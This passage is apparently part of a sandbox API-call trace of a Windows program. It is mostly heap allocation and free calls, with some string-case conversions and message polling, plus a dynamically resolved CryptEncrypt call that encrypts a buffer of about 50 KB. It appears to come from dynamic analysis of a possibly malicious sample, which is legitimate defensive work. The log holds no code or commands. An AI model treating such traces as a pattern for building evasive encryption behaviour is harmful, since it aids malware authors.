hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34be508 | out: hHeap=0x25c0000) returned 1 [0199.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0199.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa908, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.041] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0199.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6558 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0199.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0199.042] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xc2ab, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xc2b0) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.045] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.046] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.047] CharLowerBuffW (in: lpsz="byte[49840]", cchLength=0xb | out: lpsz="byte[49840]") returned 0xb [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.047] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.050] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.050] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.050] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.051] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.051] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 